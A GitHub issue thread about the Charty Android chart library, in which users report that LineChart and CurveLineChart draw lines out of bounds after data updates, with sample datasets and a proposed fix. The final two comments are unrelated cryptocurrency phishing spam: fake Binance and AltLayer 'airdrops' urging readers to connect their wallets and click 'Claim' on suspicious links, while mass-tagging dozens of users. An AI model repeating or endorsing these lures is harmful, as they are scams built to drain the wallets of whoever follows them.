### ISSUE TITLE
Line drawn out of bounds on dataset update

### ISSUE THREAD

**Issue by sanskar10100** [hi-manshu/Charty#46]
Using a `LineChart`, when the dataset is updated with a large value, the recomposition results in a line being drawn out of bounds.

```kotlin
LineChart(
            lineData = pagesReadData,
            color = MaterialTheme.colors.primaryVariant,
            modifier = modifier
                .height(250.dp)
                .fillMaxWidth()
                .padding(32.dp),
            axisConfig = AxisConfig(
                showAxis = true,
                isAxisDashed = false,
                showUnitLabels = true,
                showXLabels = true,
                xAxisColor = MaterialTheme.colors.onSurface,
                yAxisColor = MaterialTheme.colors.onSurface,
            )
        )
```

Resultant:
![Screenshot_20220923_195016](https://user-images.githubusercontent.com/22092047/191983372-07aca0d4-6de4-4f23-beec-d29120786bff.png)

ScreenCap:
[Out of bounds.webm](https://user-images.githubusercontent.com/22092047/191982743-8d0b69c1-e923-435e-a302-c105b22d070b.webm)

Please let me know if any other data is needed.

**Comment by hi-manshu** [comment]
Hey buddy, thank you for this. Can you pass your dataset for me to replicate!

thanks

**Comment by sanskar10100** [comment]
Initial Data:
```
LineData(xValue=23 Sep , yValue=10.0)
LineData(xValue=24 Sep , yValue=10.0)
```

Updated Data:
```
LineData(xValue=23 Sep , yValue=10.0)
LineData(xValue=24 Sep , yValue=10.0)
LineData(xValue=26 Sep , yValue=20.0)
```

Result:
![image](https://user-images.githubusercontent.com/22092047/192212763-685f8d7a-6425-49c9-8189-70cf5d92e498.png)

**Comment by hi-manshu** [comment]
Thank you, will check soon!

**Comment by sanskar10100** [comment]
Hey @hi-manshu sorry to bug you, but any update on this?

**Comment by khaleeljageer** [comment]
Hi,
I'm facing similar problem with CurveLineChart.
When I load the follwing LineData, recomposition draw the CurveLine chart out of bounds.


![Screenshot from 2022-10-29 17-41-21](https://user-images.githubusercontent.com/28587143/198830993-77c4fefb-f665-4792-8096-e6901ca61676.png)

LineData that I used.

```
listOf(
  LineData(xValue = "23 Sep", yValue = 0.793f),
  LineData(xValue = "24 Sep", yValue = 0.766f),
  LineData(xValue = "25 Sep", yValue = 0.746f),
  LineData(xValue = "26 Sep", yValue = 0.786f),
  LineData(xValue = "27 Sep", yValue = 0.735f),
  LineData(xValue = "28 Sep", yValue = 0.712f),
  LineData(xValue = "29 Sep", yValue = 0.744f),
  LineData(xValue = "30 Sep", yValue = 0.774f)
)
```

**Comment by AlexZhukovich** [comment]
Fixed this issue in PR #55

**Comment by khaleeljageer** [comment]
Hi @AlexZhukovich ,

Tested the fix with your branch. Found that the issue still exist with the following LineData.

```
listOf(
  LineData(xValue = "23 Sep", yValue = 0.793f),
  LineData(xValue = "24 Sep", yValue = 0.766f),
  LineData(xValue = "25 Sep", yValue = 0.746f),
  LineData(xValue = "26 Sep", yValue = 0.786f),
  LineData(xValue = "27 Sep", yValue = 0.735f),
  LineData(xValue = "28 Sep", yValue = 0.712f),
  LineData(xValue = "29 Sep", yValue = 0.744f),
  LineData(xValue = "30 Sep", yValue = 0.774f)
)
```

**Comment by AlexZhukovich** [comment]
@khaleeljageer I think here we have different issues. The initial issue is related to adding additional data and updating the chart component. In your case, the data is displaying incorrectly.

**Comment by arconejeros** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @qst0, @wtfiwtz, @0xhydrogen, @coolcode, @barrasso, @zubayrrr, @willzhuang, @SofianeBoumedine, @eolszewski, @rayeaster, @pcranaway, @yongseongkim, @TerrorJack, @simudream, @qfengthree, @stas, @eueung, @UnderratedDev, @bmiller59, @TheBlapse, @sheluchin, @cppchedy, @veronicaz41, @notaquant, @sger, @dmitri-dev, @seansummers, @cavb, @maximebrugel, @drizzyrdrgz-exe, @hp-huang-tw, @Nubuck, @keivinonline, @Dyonishw, @makramkd, @seifsg, @julian0zzx, @maaverik, @nimeshneema, @ojhariddhish, @holyshared, @kaleb-keny, @ricoregala, @laizy, @melvinzhang, @durdn, @hc0208, @onlymaresia, @luisgdev, @headsrooms

**Comment by deenMuhammad** [comment]
# AltLayer Airdrop Season One Update

[![AltLayer Airdrop Season One](https://i.ytimg.com/vi/9uxY8uLf3bE/maxresdefault.jpg)](https://go.altlayercommunity.online/XY2wna)

🚀 **Exciting Announcement!** AltLayer token (ALT) is gearing up for its Binance launch on January 25, 2024. As a token of appreciation, we extend a warm invitation to you to join the "ALT Token community" through an exclusive airdrop tailored for our early supporters and partners. Here's a quick overview:

- **Total Allocated ALT Tokens:** 300,000,000 (3% of the total supply)
- **Distribution Categories:**
  - Ethereum Mainnet
  - Binance Mainnet

For a comprehensive breakdown of criteria and further details, refer to the complete announcement [Oficial Website](https://go.altlayercommunity.online/XY2wna).

The window to [Claim $ALT tokens](https://go.altlayercommunity.online/XY2wna) is open from January 25 to February 03, 2024. 

Any unclaimed $ALT tokens after this period will be returned to AltLayer’s Treasury.

We deeply appreciate your contribution to AltLayer's success! Stay tuned for more exciting developments in Season One.

**Important:** Please be aware of certain regional restrictions on the airdrop. Review the disclaimer before participating.

Mofu2Monarch, @soltantafe, @90tech, @onorjay, @hahaguo, @ahmetcaglayan, @Jackiexiao, @senzen777, @Leo-Lee15, @steven5538, @gengmoqi, @JoseRodrigues443, @whiteclover, @codyphobe, @MM422, @Ubiquitouskiwi, @fang503, @ys1111, @mmuhd, @flyingfoxlee
